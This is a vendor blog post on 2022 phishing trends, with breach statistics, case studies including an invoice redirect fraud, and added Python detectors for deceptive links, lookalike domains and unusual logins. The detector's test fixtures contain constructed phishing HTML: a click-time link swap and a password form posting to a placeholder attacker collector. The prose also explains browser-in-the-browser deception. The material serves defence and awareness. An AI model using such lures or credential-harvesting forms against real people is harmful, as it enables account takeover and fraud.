Thursday, October 13th, 2022
State of Phishing 2022
Over the last twelve months, research has found that phishing remains the most common technique for gaining unauthorised access to an IT system. Its popularity lies in a simple attack vector that exploits the weaknesses of human operators: it is a flexible, low-cost, low-risk way to launch an attack. An email sent to thousands of users only needs one recipient to click on one link. But phishing in 2022 has evolved past the simple technique of sending mass emails to large numbers of users into attacks that are more sophisticated, more targeted and increasingly difficult to spot.
In its Cyber Security Breaches Survey 2022, the UK Government reported that 39% of UK businesses identified at least one cyber-attack in the previous twelve months, and that 83% of those businesses identified phishing attempts.
Worryingly, 31% of the businesses reporting attacks estimate that they were attacked at least once a week. Furthermore, one in five of these businesses experienced an adverse outcome, such as business disruption or direct financial loss.
Email remains the most prevalent method of initiating a phishing attack. Figures from 2021 show that attackers used email in 96% of recorded incidents. Malicious websites accounted for 3% of incidents, and other forms of messaging, including text messages, accounted for the remainder.
IBM’s “Cost of a Data Breach” report, issued in July 2022, gave the following updated metrics:
- USD $4.91 million average total cost in 2022 of a breach whose initial attack vector was phishing
- USD $4.35 million average total cost of a data breach in 2022
- 83% of organisations have had more than one breach
- 19% of breaches caused by stolen or compromised credentials
- 59% of organisations don’t deploy zero trust
Recent research into the impact of phishing attacks on businesses found that:
- 60% of affected businesses lost important information
- 52% of affected businesses had access credentials compromised
- 47% of affected businesses suffered a ransomware infection
- 29% of affected businesses suffered a malware infection
- 18% of affected businesses suffered financial loss
Attackers use phishing messages to launch attacks, either delivering malware directly through attachments or linking to an external resource that convinces the user to hand over their access credentials. With increasing user awareness of the risks of email attachments, phishing has evolved so that in 2022 only 24% of phishing emails contained an attachment. Of those, HTML attachments were the most common method of initiating an attack, overtaking PDF attachments, which were the most common malicious attachment type in 2021. An HTML attachment opens locally in the browser and can carry the credential-harvesting form itself, so there is no remote URL for a link filter to reputation-check until the user submits the form.
Most Prominent Attacks of 2021-2022
The Russian invasion of Ukraine saw a massive campaign of phishing attacks on Ukrainian public authorities and critical infrastructure. The attacks sought to gain access to systems and networks and to install and spread malware. Following the invasion, the Ukraine State Service of Special Communication and Information Protection (SSSCIP) detected further phishing campaigns from Russian and Belarusian state actors targeting Ukrainian military personnel.
The University of California San Diego (UCSD) Health suffered a data breach in 2021 that exposed the sensitive personal information of patients, employees and students. The attack started in December 2020 with a phishing email, and the attacker then compromised several additional email accounts with further phishing attacks over the period to April 2021. System administrators spotted suspicious activity in March 2021 and in April 2021 detected unauthorised access to one of the affected email accounts. UCSD Health notified the affected parties and provided advice.
Utah-based healthcare provider Revere Health suffered a data breach in June 2021 that exposed the sensitive personal information of around 12,000 cardiology patients. The attack started with a phishing email purporting to be from the US Agency for International Development (USAID) that harvested a user’s credentials when they clicked a link. The attacker then used those credentials to log in to the user’s email account and read patients’ personal information held in stored emails.
Revere Health’s IT security team detected the unauthorised activity and halted the attack in under an hour by severing the connection to its systems. That was still long enough for the attacker to exfiltrate the contents of the compromised email account. Security researchers believe the attacker was looking to gather further credentials and move laterally across systems for financial gain rather than to steal patient information.
Insights for Phishing 2022
New Attack Vectors
Over the last year, a sophisticated phishing campaign that could bypass automated phishing detection has targeted Office 365 users, mimicking legitimate services and directing users to a simulated SharePoint page, where they were asked to enter their credentials to access what appeared to be a legitimate file share request. The phishing emails could be detected by URLs with malformed HTTP headers. The primary phishing URL pointed to an appspot.com (Google App Engine) resource that collected the user’s credentials and then led on to a Google User Content domain hosting an Office 365 phishing page.
April 2022 saw a new phishing technique emerge using browser-in-the-browser fake pop-up windows that emulate the single sign-on windows used by sites such as Facebook and Google. The fake pop-up is drawn with HTML and CSS inside the attacker’s own page, so it can be made visually identical to the genuine window, complete with a padlock and a legitimate-looking address, while the hosting page itself carries a valid TLS certificate that lends false assurance. One tell is that a drawn window cannot be dragged beyond the edge of the browser’s real viewport. The implementation can also show the user a legitimate web address when the mouse hovers over a link and only substitute the malicious URL once the user clicks it, typically by rewriting the link target in a mousedown or click handler.
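The two link tricks described above (a handler that swaps the URL at click time, and link text that shows one address while the href points to another) and the local credential form in an HTML attachment can all be spotted by parsing the HTML before it reaches a user. The following is an added example written for this article, not code from Smarttech247 or from any product mentioned here; the email body and attachment it scans are constructed samples, and the `attacker.test` and `example-corp.com` hosts are placeholders.

```python
"""Flag deceptive links and local credential forms in an HTML email body or attachment.

Checks (all heuristics, illustrative rather than a complete phishing filter):
  * an anchor whose mousedown/click handler rewrites href or location, so the
    hover-time URL differs from the one actually followed;
  * visible link text that is itself a URL whose host differs from the href host;
  * a password input inside the HTML, i.e. the harvesting form is local to the
    attachment and there is no remote URL to reputation-check.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)
HANDLER_ATTRS = ("onclick", "onmousedown", "onmouseup", "ontouchstart")


class LinkAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # (rule, detail_a, detail_b)
        self.forms = []             # form action URLs seen
        self.has_password_field = False
        self._anchor = None         # attrs of the <a> currently open
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)             # HTMLParser lowercases tag and attribute names
        if tag == "a":
            self._anchor, self._text = a, []
        elif tag == "form":
            self.forms.append(a.get("action", ""))
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True

    def handle_data(self, data):
        if self._anchor is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag != "a" or self._anchor is None:
            return
        a, text = self._anchor, "".join(self._text).strip()
        self._anchor = None
        href = a.get("href", "")
        # Rule 1: a JavaScript handler that changes the target at click time.
        for attr in HANDLER_ATTRS:
            if attr in a and re.search(r"href|location", a[attr], re.I):
                self.findings.append(("href-rewrite-handler", href, a[attr]))
        # Rule 2: the visible text is a URL for a different host than the real target.
        shown = URL_RE.search(text)
        if shown:
            shown_host = (urlparse(shown.group(0)).hostname or "").lower()
            real_host = (urlparse(href).hostname or "").lower()
            if shown_host != real_host:
                self.findings.append(("display-host-mismatch", shown_host, real_host))


def audit_html(html: str) -> dict:
    """Parse one HTML document and return the findings as a plain dict."""
    p = LinkAuditor()
    p.feed(html)
    p.close()
    return {"link_findings": p.findings,
            "local_credential_form": p.has_password_field,
            "form_actions": p.forms}


# Constructed samples (not real phishing mail): a SharePoint-style lure and an HTML attachment.
SAMPLE_EMAIL = """<p>Your file share request is ready.</p>
<a href="https://sharepoint.example-corp.com/file"
   onmousedown="this.href='https://login-example.attacker.test/o365'">
   https://sharepoint.example-corp.com/file</a>
<a href="https://login-example.attacker.test/o365">https://login.microsoftonline.com/</a>
<a href="https://www.example-corp.com/policy">Acceptable use policy</a>
"""
SAMPLE_ATTACHMENT = """<html><body><form action="https://collector.attacker.test/post">
<input name="user"><input type="password" name="pw"><button>Sign in</button></form></body></html>"""

if __name__ == "__main__":
    for name, doc in (("email", SAMPLE_EMAIL), ("attachment", SAMPLE_ATTACHMENT)):
        print(name, audit_html(doc))
```

The first anchor in the sample hovers as the genuine SharePoint URL but its `onmousedown` handler swaps the target before the click is followed; the second shows a Microsoft login URL as text while linking elsewhere; the third is an ordinary link and produces nothing. The attachment sample is flagged because it contains a password field and posts to an attacker-controlled collector, which is the pattern that makes HTML attachments attractive to phishers.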
Research suggests that advances in deepfake technology may allow it to be employed in phishing attacks to provide compelling audio or video messages that simulate a living person known to the recipient. If this becomes a practical reality, such messaging could deliver persuasive content as part of a sophisticated spear phishing attack.
Phishing has accounted for 16% of breaches so far this year, making it the second most common initial attack vector as well as the costliest, at an average of $4.91 million per breach. 83% of organisations have had more than one breach this year, and 60% had to increase the price of their products or services as a result of a breach.
Increasing user awareness of, and suspicion towards, email is reducing click-through rates. Consequently, attackers are increasingly turning to other messaging routes, including text messages (smishing) and services such as WhatsApp, to launch phishing attacks. Users tend to treat these notifications as more trustworthy because they are less familiar with the channels’ security weaknesses. The widespread availability of mobile numbers, obtained from data breaches or from legitimate marketing organisations, makes this form of phishing practical, and online retailers’ routine use of text messages for order confirmations and delivery updates makes it easy to craft a credible lure.
Attackers are looking to move away from better protected large organisations to target smaller companies with less capable defences. In addition, the prevalence of integrated supply chains through network connectivity between suppliers means that compromising a small business at the bottom of the supply chain offers a route for lateral movement up the supply chain to the larger and more lucrative targets.
Spear phishing is now more commonplace thanks to the widely available information on professional networking and career development websites. Initially targeting larger organisations, almost any size business can now be subject to targeted phishing with credible and compelling messages that improve the attackers’ chances of success.
Attackers also use business impersonation to improve click-through rates by combining targeted phishing with emails that impersonate senders known to the recipient. These can appear as internal communications or as messages from contacts, suppliers or other individuals and companies that the recipient knows or has a business relationship with. They may also use more general impersonation, mimicking communications from official bodies such as tax authorities or from commonly used businesses such as Microsoft and Amazon. Here, success relies on the likelihood that the recipient has previously interacted with the impersonated organisation.
Phishing-as-a-Service (PhaaS): A Growing Trend
These days, with services like PhaaS, cybercrime has become accessible to anyone who knows where to look and is willing to pay. PhaaS is a black-market industry in which experienced cybercriminals sell their knowledge as well as access to their tools, enabling others to carry out a phishing attack successfully.
Cybercriminals advertise their ‘phishing kits’ on the dark web which include everything needed to carry out a phishing attack. These kits often include curated databases of targets and branded email templates. Some cybercriminals also offer access to collated open-source intelligence (OSINT) which allow users to create highly convincing attacks, or the back-end code to create fraudulent webpages that mimic well-known brands to harvest credentials.
We have seen PhaaS grow in popularity in recent months because it is a very low-risk option for the experienced hacker: they can put their skills to use and make money with very little chance of being caught.
Phishing as a service has made phishing more profitable as cybercriminals no longer need to spend time building their own email templates or false websites to scrape credentials or payment information. All they need to do is download a kit from a PhaaS vendor and follow the instructions to launch their attack. The time between ideation of attack and ‘fulfilment’ is minimal.
Invoice Redirect Fraud:
Lucrative for the Criminals, Devastating for Businesses
Invoice redirect fraud is where fraudsters pretend to be a supplier or service provider to trick employees into changing bank account payee details. This type of attack is typically well engineered by cyber criminals. It can have devastating effects on legitimate businesses, especially small companies that deal with large suppliers.
An invoice fraud case study
The victim organisation (a small manufacturing firm in Ireland) hired a new CFO, who announced the new role on LinkedIn. That was ideal information for the adversaries to use in crafting a social engineering attack targeting the new CFO. The cyber criminals (logging in from Lithuania) launched a sophisticated spear phishing attack to steal the CFO’s credentials.
After gaining access to the CFO’s inbox, the attackers waited and read correspondence about a regular transaction in which the victim company paid a large supplier €500,000 a month. A new invoice arrived for the CFO to approve. Payment was not due until the end of the month, so the CFO did not act on it straight away, and the attack began in the meantime. The attackers registered a new domain closely resembling the victim organisation’s own domain, forwarded a few emails from the compromised inbox to the fraudulent mailbox, and inserted themselves into the correspondence impersonating the supplier.
They then sent an email continuing the original thread with a new invoice attached, advising that they were having problems with their bank account and giving new account details for payment. The victim organisation paid the requested amount to the account at the other bank. It learned of the fraud only when the real supplier made contact to say the funds had not arrived and confirmed that the bank details on the second invoice were not theirs.
The victim organisation’s IT team investigated where the email interception had happened, but by the time the alarm was raised the fraudsters had already moved the money on.
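The pivot point in this case was a freshly registered domain that differed from a known domain by a character or two. A finance mailbox can catch that before anyone approves a changed bank detail by scoring every inbound sender domain against the list of suppliers actually on the books. The example below is added for this article and is not Smarttech247 code or the victim’s tooling; the supplier domains and sender addresses are constructed, the confusable-character table is a deliberately small illustrative one, and public-suffix handling (such as `.co.uk`) is left out of scope.

```python
"""Score an inbound sender domain against trusted supplier domains.

Flags the registration trick in the case study: a label one or two edits away
from a supplier's real domain, the same label under a different TLD, a confusable
character substitution (rn for m, 0 for o, 1 for l), or the trusted name padded
with extra words (acme-metals-invoicing.com).
"""

# Assumption: a small illustrative table, not a full Unicode confusables list.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w", "cl": "d"}


def canonical(label: str) -> str:
    """Collapse confusable sequences so 'acrne-metals' compares equal to 'acme-metals'."""
    out = label.lower()
    for fake, real in CONFUSABLES.items():
        out = out.replace(fake, real)
    return out


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance with a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def split_domain(domain: str):
    """Return (registrable label, tld) for a plain host such as 'acme-metals.ie'.
    Assumption: the last label is the TLD; multi-part suffixes like co.uk are out of scope."""
    parts = domain.lower().strip(".").split(".")
    return (parts[0], "") if len(parts) < 2 else (parts[-2], parts[-1])


def classify_sender(sender_domain: str, trusted: list) -> tuple:
    """Return (verdict, matched_trusted_domain).

    'trusted'   exact match with a supplier on file
    'lookalike' near match: route the message for manual review before acting on it
    'unknown'   no resemblance to anything on file
    """
    s_label, s_tld = split_domain(sender_domain)
    for t in trusted:
        if split_domain(t) == (s_label, s_tld):
            return "trusted", t
    for t in trusted:
        t_label, _ = split_domain(t)
        # identical after confusable folding, or same label under another TLD
        if canonical(s_label) == canonical(t_label):
            return "lookalike", t
        # typosquat: within two edits (one edit for short labels, to limit false positives)
        limit = 1 if len(t_label) <= 6 else 2
        if edit_distance(s_label, t_label) <= limit:
            return "lookalike", t
        # trusted name embedded in a longer label
        if len(t_label) >= 5 and t_label in s_label:
            return "lookalike", t
    return "unknown", None


# Constructed data: suppliers on file and a batch of sender domains to score.
TRUSTED_SUPPLIERS = ["acme-metals.ie", "northbank-logistics.com"]
SAMPLE_SENDERS = ["acme-metals.ie", "acrne-metals.ie", "acme-metals.com",
                  "acme-metal.ie", "acme-metals-invoicing.com", "shop.example.org"]


def score_batch(senders: list, trusted: list) -> dict:
    return {s: classify_sender(s, trusted) for s in senders}


if __name__ == "__main__":
    for sender, verdict in score_batch(SAMPLE_SENDERS, TRUSTED_SUPPLIERS).items():
        print(f"{sender:30} {verdict}")
```

In practice the "lookalike" verdict should gate any request to change payee details, together with an out-of-band phone call to the supplier on a number already on file, since the email thread itself is exactly what the attacker controls.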
Why was this attack successful?
- The victim organisation did not provide user awareness training to the new CFO in a timely manner
- They did not have MFA turned on
- No monitoring in place to detect attacks in real time (in particular, logins from unexpected geographic locations)
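The third gap, missing monitoring of where logins come from, is the cheapest to close. The following is an added example for this article, not Smarttech247 code: it parses a few constructed sign-in log lines (the format, the users and the countries are all made up for the example) and raises two alerts, a first successful login from a country outside the user's baseline and two successful logins from different countries closer together than a plausible journey. The six-hour travel window is an assumption to be tuned per organisation.

```python
"""Flag mailbox logins from unexpected countries and impossible travel.

Input lines (constructed format for this example) look like:
  2022-09-12T08:01:10Z user=cfo@acme-metals.ie country=IE result=success
Rules:
  1. new-country:        first successful login from a country not in the user's baseline
  2. impossible-travel:  successful logins from two countries less than TRAVEL_WINDOW apart
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) country=(?P<country>[A-Z]{2}) result=(?P<result>\w+)$"
)
TRAVEL_WINDOW = timedelta(hours=6)   # assumption: tune to the organisation's travel patterns

# Constructed sign-in log: a CFO normally in Ireland, then a successful login from Lithuania
# in the small hours, followed by a login from Ireland a few hours later.
SAMPLE_LOG = """\
2022-09-12T08:01:10Z user=cfo@acme-metals.ie country=IE result=success
2022-09-12T17:45:03Z user=cfo@acme-metals.ie country=IE result=success
2022-09-13T02:12:44Z user=cfo@acme-metals.ie country=LT result=failure
2022-09-13T02:13:30Z user=cfo@acme-metals.ie country=LT result=success
2022-09-13T08:05:00Z user=cfo@acme-metals.ie country=IE result=success
2022-09-13T09:20:11Z user=ops@acme-metals.ie country=IE result=success
"""


def parse_log(text: str) -> list:
    """Parse log lines into dicts sorted by timestamp; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue    # tolerate noise rather than crash the pipeline
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(d)
    return sorted(events, key=lambda e: e["ts"])


def detect_anomalies(events: list, baseline: dict) -> list:
    """Return (rule, user, detail) alerts.

    baseline maps user -> set of countries they normally log in from
    (assumption: built from prior weeks of known-good activity).
    """
    alerts = []
    last_success = {}          # user -> (timestamp, country) of the previous success
    seen = defaultdict(set)    # countries already alerted on per user, to avoid repeats
    for e in events:
        if e["result"] != "success":
            continue           # failures matter for other rules, not for these two
        u, c, ts = e["user"], e["country"], e["ts"]
        if c not in baseline.get(u, set()) and c not in seen[u]:
            alerts.append(("new-country", u, f"{c} at {ts.isoformat()}"))
        seen[u].add(c)
        if u in last_success:
            prev_ts, prev_c = last_success[u]
            if prev_c != c and ts - prev_ts < TRAVEL_WINDOW:
                alerts.append(("impossible-travel", u, f"{prev_c}->{c} in {ts - prev_ts}"))
        last_success[u] = (ts, c)
    return alerts


def run_sample() -> list:
    baseline = {"cfo@acme-metals.ie": {"IE"}, "ops@acme-metals.ie": {"IE"}}
    return detect_anomalies(parse_log(SAMPLE_LOG), baseline)


if __name__ == "__main__":
    for rule, user, detail in run_sample():
        print(f"{rule:18} {user:24} {detail}")
```

On the sample the Lithuanian login trips the new-country rule on its own, and the Irish login 5 hours 51 minutes later trips impossible-travel; either alert, routed to someone who can suspend the session and force a credential reset, would have interrupted the attackers before the forged invoice went out.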
• 2022 has seen cryptocurrencies and non-fungible tokens become a popular target for attackers, driven by a rapid rise in public interest and limited awareness of the risks.
• The retail sector remains the most popular target for phishing emails, followed by manufacturing, food and beverage, and technology.
• Businesses in North America remain the most common target for phishing in 2022, closely followed by Western Europe and Australasia.
How to Protect Yourself from Phishing 2022
There are several risk prevention measures that can help mitigate phishing. These include:
– Multi-factor authentication
Multi-factor authentication grants a user access to a website or application only after they successfully present two or more pieces of evidence to the authentication mechanism. Implementing MFA adds a layer of security that reduces the likelihood of a successful spear phishing attack. Make sure you turn on MFA on all your online accounts, personal and professional. One caveat: a one-time code typed into a phishing page can be relayed to the real site by an attacker proxying the login in real time, so where it is available prefer a phishing-resistant method such as a FIDO2 security key, which binds the credential to the genuine site’s origin.
– Educational campaigns
At the organisational level, enterprises can raise awareness and actively train employees. They should highlight spear phishing attacks as a high-risk threat. Training materials can feature real-life examples of spear phishing, with questions designed to test employee knowledge. Employees who are aware of spear phishing are less likely to fall victim to an attack.
– Password policy
A well-defined password management policy should take steps to prevent employees from reusing corporate passwords on external websites, real or fake. It should set out the criteria for a strong password, when passwords should be changed (current NCSC and NIST guidance favours changing a password when compromise is suspected rather than on a fixed schedule) and that passwords must never be shared. It should also state that a password must never be entered into a site the user suspects is suspicious, because a single captured password can expose every system and application it unlocks.
– Be careful what information you share online
Successfully crafted spear-phishing attacks use the information you share online against you: your job description, your contact details, your daily routine, even your images or your voice. Limit the information you share online so that attackers cannot use it to craft convincing spear-phishing content.
– Implement Phishing Defence Capabilities
Even with the best security procedures in place, phishing emails will end up in your users’ mailboxes. Organisations need a fast and easy way of reporting and investigating these suspicious emails.
NoPhish by Smarttech247 identifies and investigates even the most complex phishing attempts and removes the threat from your organisation in real time. Your users can report a suspicious email with a single click, keeping the whole organisation safe. NoPhish is a simple Office 365 app integration that can be deployed in minutes, and it also hunts for the same reported email in other users’ inboxes to ensure the whole organisation is safe.
Simply put, the best defence is the multi-layered approach that offers a customised phishing solution.
Technical controls can weed out the obvious and highlight the possibly suspicious. In addition, training in phishing recognition and critical thinking, followed by refresher training and test campaigns, reinforces awareness.
Phishing in 2022 remains the primary method of launching a cyber-attack, and while awareness is increasing, businesses cannot be complacent as attacks continue to evolve to bypass standard controls. User tricks such as checking the sender’s email address or hovering the mouse over a link to check the underlying URL will not always be effective as attacks become more sophisticated, since both the display name and the hover-time link target are under the attacker’s control.
Successful protection against phishing in 2022 requires a layered approach to maximise detection. Defences start with email and DNS filtering to block known threats, supported by next-generation anti-malware software. Next, detecting novel threats and countering advanced persistent threats requires more comprehensive detection techniques supported by threat intelligence. Finally, employee security awareness training and exercises reduce the likelihood of users falling for a phishing message that bypasses the technical controls and reaches their inbox.